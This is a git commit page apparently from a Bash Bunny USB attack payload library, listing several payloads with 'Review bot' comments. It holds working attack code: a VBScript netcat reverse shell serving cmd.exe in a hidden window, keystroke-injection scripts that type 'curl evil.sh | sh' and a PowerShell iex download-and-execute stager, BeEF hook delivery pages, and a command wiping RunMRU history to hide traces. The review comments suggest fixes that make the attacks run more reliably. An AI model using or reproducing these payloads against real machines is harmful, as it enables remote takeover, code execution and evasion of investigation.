Cleanup: Sort payloads by category

Sebastian Kinne
2017-04-10 13:29:17 +10:00
parent 288d90c60e
commit 85b1bc7aca
513 changed files with 2 additions and 361 deletions


@@ -0,0 +1,162 @@
Option Explicit
'==============================================================================
' Title: a.vbs
' Author: RalphyZ
' Version: 1.0
' Target: Windows 7+
'
' Description:
' This VBScript is used by a BashBunny payload to
' to create a netcat reverse shell. The netcat listener
' IP Address and Port are stored in separate files - so that
' Red Teams can quickly change information. The "IncrementPort"
' subroutine will increase the port number by 1 every time the
' script is called. This is so that you can start multiple
' listeners while doing a PenTest, and grab multiple reverse
' shells in one trip. Uncomment that if you want the auto-increment
'
' Note: You must put the netcat executable in the strReverseShellPath directory
'==============================================================================
' Declare Constants
Const ForReading = 1
Const ForWriting = 2
' Declare Global Variables
Dim strListenerPort, strNewListenerPort, strListenerIP
Dim objFSO, objFile, strCurrentDirectory
Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile
' The netcat executable name
strNetCatEXE = "nc.exe"
' The folder location
strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
' The file containing the listener port
strListnerPortFile = "listener_port.txt"
' The file containing the listener ip address
strListenerIPFile = "listener_ip.txt"
' Create a File System Object
Set objFSO = CreateObject("Scripting.FileSystemObject")
strCurrentDirectory = FindCurrentDirectory()
' Read the Host IP Address (where the listener resides)
ReadHostIP
' Read the listener port
ReadPort
' Increment the listener port - for multiple shells
' Great for Red Teams
'IncrementPort
' Start NetCat Reverse Shell
StartNetCat
'==============================================================================
' Name: FindCurrentDirectory
' Arguments: None
' Return Value: None
' Description: Find the netcat executable
'==============================================================================
Function FindCurrentDirectory
Dim objDrives, d
' Set default return value
FindCurrentDirectory = ""
' Search all drives for the netcat exe
Set objDrives = objFSO.Drives
For Each d in objDrives
If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then
FindCurrentDirectory = d + strReverseShellPath
End if
Next
End Function
'==============================================================================
' Name: ReadHostIP
' Arguments: None
' Return Value: None
' Description: Read the listener IP
'==============================================================================
Sub ReadHostIP()
' Opens the file for reading
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading)
' Read the host IP
strListenerIP = objFile.ReadAll
' Close the file
objFile.Close
End Sub
'==============================================================================
' Name: ReadPort
' Arguments: None
' Return Value: None
' Description: Read the listener port
'==============================================================================
Sub ReadPort()
' Opens the file for reading
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading)
' Read the listener port
strListenerPort = objFile.ReadAll
' Close the file
objFile.Close
End Sub
'==============================================================================
' Name: IncrementPort
' Arguments: None
' Return Value: None
' Description: Read the listener port, increment the counter by 1, and write
' the new value
'==============================================================================
Sub IncrementPort()
' Increment the listener port
strNewListenerPort = strListenerPort + 1
' Open the file that contains the listener port for writing
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting)
' Write the new (incremented) port
objFile.WriteLine strNewListenerPort
' Close the file
objFile.Close
End Sub
'==============================================================================
' Name: StartNetCat
' Arguments: None
' Return Value: None
' Description: Start netcat on the appropriate port
'==============================================================================
Sub StartNetCat()
Dim strNetCat, strCommand, objShell
' Build the path to the netcat executable
strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE)
' Create the command string to run netcat on the correct ip and port,
' and serve cmd.exe to the listener
strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe"
' Create the WScript Shell object
Set objShell = WScript.CreateObject ("WScript.Shell")
' Run the command (' , 0'= hidden)
objShell.run strCommand, 0
' Free the object from memory
Set objShell = Nothing
End Sub
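Review bot: The script body calls `ReadHostIP` and `ReadPort` even when `FindCurrentDirectory` returned its default `""`, so a missing `nc.exe` ends in an unhandled `OpenTextFile` error on a bare file name instead of a clean exit. A guard right after the assignment, `If strCurrentDirectory = "" Then WScript.Quit 1`, would stop there. The function's header says `Return Value: None` and `Find the netcat executable`, while the code returns the folder that holds it (or an empty string); the header should say so. `strReverseShellPath` is hard-coded to `\payloads\library\RAZ_ReverseShell\`, so if this commit's re-sorting moves the payload to another library folder the constant has to follow; the destination path is not visible on this page.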


@@ -0,0 +1 @@
192.168.1.100


@@ -0,0 +1 @@
4444


@@ -0,0 +1,35 @@
#!/bin/bash
#
# Title: RAZ_VBScript
# Author: RalphyZ
# Version: 1.0
# Target: Windows 7+
# Dependencies: VBScript (a.vbs) in the switch folder with this file
#
# Description: Executes a VBScript, concealed in a hidden PowerShell window
#
# Colors:
# Green.....................Working
# White.....................Completed without error
# Light-Blue (blinking).....a.vbs was not found
LED G
ATTACKMODE HID STORAGE
# Get the switch position
source bunny_helpers.sh
# Check if a.vbs is present
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
LED B G 100
exit 1
fi
# Run the VBScript
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
QUACK ENTER
# Green LED for finished
LED R G B
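Review bot: The closing comment `# Green LED for finished` matches neither the code nor the header: `LED R G B` is white, which the colour table lists as `Completed without error`, and `LED G` is already used at the top for `Working`. The comment should read `# White LED: keystrokes sent`, and the table entry would be more accurate as `Keystrokes sent`, since nothing in the script checks that a.vbs actually ran. The header could also name the host-side traces a run leaves, presumably a Run-dialog history entry (the `RunMRU` key that another payload on this page clears) and a `powershell -WindowStyle Hidden` process start, so that whoever correlates the test against endpoint logs knows what to look for.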


@@ -0,0 +1,6 @@
!#/bin/bash
# opens browsers to the bunny's index.html page
[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1
[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1
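Review bot: The first line reads `!#/bin/bash`, which is not a shebang, so the interpreter is never selected and the line is run as a command when the file is fed to a shell; it should be `#!/bin/bash`. The ShellExec payload on this page pipes the file to `sh`, so the `[[ ... ]]` tests also depend on `sh` being bash. The portable form is `[ "$(uname)" = "Darwin" ] && open http://172.16.64.1`, and likewise for the Linux line. The hunk header announces six lines and four are shown, so blank lines may have been lost in rendering.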


@@ -0,0 +1 @@
alert('This is where your evil JavaScript file would go')


@@ -0,0 +1,12 @@
<html>
<head>
<script type="text/javascript" src="http://172.16.64.1/hook.js"></script>
</head>
<body>
Nothing to see here!
</body>
</html>


@@ -0,0 +1,54 @@
#!/bin/bash
# Title: ShellExec
# Author: audibleblink
# Target: Mac/Linux
# Version: 1.0
#
# Create a web server on the BashBunny and forces
# the victim download and execute a script.
#
# White | Ready
# Ammber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
LED R G B
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
source bunny_helpers.sh
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
log_file=$payload_dir/shellexec.log
cd $payload_dir
# starting server
LED R G 500
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED B 500
Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 100
Q ENTER
Q DELAY 2000
# Q ALT F2 # swap with block above for linux
# Q DELAY 100
Q STRING curl "http://$HOST_IP/evil.sh" \| sh
# in case curl isn't installed
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
Q ENTER
LED G
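Review bot: `python -m SimpleHTTPServer 80` is started in the foreground, so the `while ! nc -z localhost 80` wait and every `Q` line after it are reached only once the server exits. `log_file` is also assigned but never used, so nothing records which requests were served. The other payload on this page handles both in one line, and the same form fits here: `python -m SimpleHTTPServer 80 > "$log_file" 2>&1 &`. `cd $payload_dir` should be quoted, and the `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule is appended on every run and never removed, so a matching `iptables -D` at the end would leave the device's firewall as it was. The header comment spells the amber state `Ammber`.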


@@ -0,0 +1,34 @@
# ShellExec
Author: audibleblink
Version: 1.0
## Description
Serves malicious scripts or web pages from the Bunny and forces
victims to curl and execute those scripts. Scripts can also force
browsers to open a url on the bunny to do things like serve BeEF
hooks.
## Configuration
evil.py - script that is fetched with DuckyScript
(provided script opens a web page that serves a BeEF hook )
hook.js - the aforementioned BeEF hook
index.html - BeEF hook delivery page
## Requirements
Just plug and play
## Status
| LED | Status |
| --------- | ----------- |
| White | Ready |
| Amber blinking | Waiting for server |
| Blue blinking | Attacking |
| Green | Finished |


@@ -0,0 +1,69 @@
#!/bin/bash
#
# Title: Powershell Download and Execute
# Author: LowValueTarget
# Version: 1.1
# Category: Powershell
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, RNDIS_ETHERNET
# Firmware: >= 1.1
#
# OPTIMIZED FOR BASHBUNNY 1.1_x+
#
# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | Stage 1 | Running Initial Powershell Commands |
# | Stage 2 | Turning up web server and DHCP |
# | Stage 3 | Delivering powershell payload |
#
LED SETUP
# Set working dir
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
cd $PAYLOAD_DIR
SERVER_LOG=server.log
# Fresh Server Log
rm -f $SERVER_LOG
# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+)
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
# Check for psh.txt
if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
LED FAIL
exit 1
fi
# Attack HID
ATTACKMODE HID
LED STAGE1
# Attack
RUN WIN "powershell -WindowStyle Hidden \"while (\$TRUE) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { iex (New-Object Net.WebClient).DownloadString('http://172.16.64.1/psh.txt'); (New-Object Net.WebClient).DownloadString('http://172.16.64.1/COMPLETE'); exit } }\""
# Wipe prints
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue\""
# Attack Ethernet
LED STAGE2
ATTACKMODE RNDIS_ETHERNET
# Start web server
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
python -m SimpleHTTPServer 80 > $SERVER_LOG 2>&1 &
# wait until python web server is listening
while ! nc -z localhost 80; do sleep 0.2; done
# Re-enable ICMP/echo replies to trip the powershell stager
echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
LED STAGE3
while ! grep -Fq "GET /COMPLETE" $SERVER_LOG; do
sleep .5
done
LED FINISH
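Review bot: `icmp_echo_ignore_all` is set to 1 before the `psh.txt` check, so the `LED FAIL` / `exit 1` path leaves the device ignoring echo requests; the check should move above the `echo "1"` line. The normal path leaves state behind as well: the DNS `DROP` rule is appended on every run and the background web server is still running at `LED FINISH`. With `SERVER_PID=$!` after the server line, `trap 'echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all; iptables -D OUTPUT -p udp --dport 53 -j DROP; kill $SERVER_PID 2>/dev/null' EXIT` would restore all three. The comment above the ICMP toggle still refers to an SMB share and smbserver, while this payload serves over HTTP. `# Wipe prints` should say what the line does, namely that it removes every value under the current user's `RunMRU` key, so that a reader auditing the payload's host-side changes does not have to decode the command.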


@@ -0,0 +1 @@
powershell "New-Item $ENV:UserProfile\Desktop\psh_downloadexec_test.txt -ItemType file"


@@ -0,0 +1,26 @@
# psh_DownloadExec
## Powershell Download and Execute
* Author: LowValueTarget
* Version: Version 1.1
* Target: Windows XP SP3+ (Powershell)
* Category: Powershell
* Attackmodes: HID, RNDIS_Ethernet
* Firmware: >= 1.1
## Description
Quick HID attack to retrieve and run powershell payload from BashBunny web server.
## Configuration
Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
## STATUS
```
| Attack Stage | Description |
| ------------------- | ---------------------------------------- |
| Stage 1 | Running Initial Powershell Commands |
| Stage 2 | Turning up web server and DHCP |
| Stage 3 | Delivering powershell payload |
```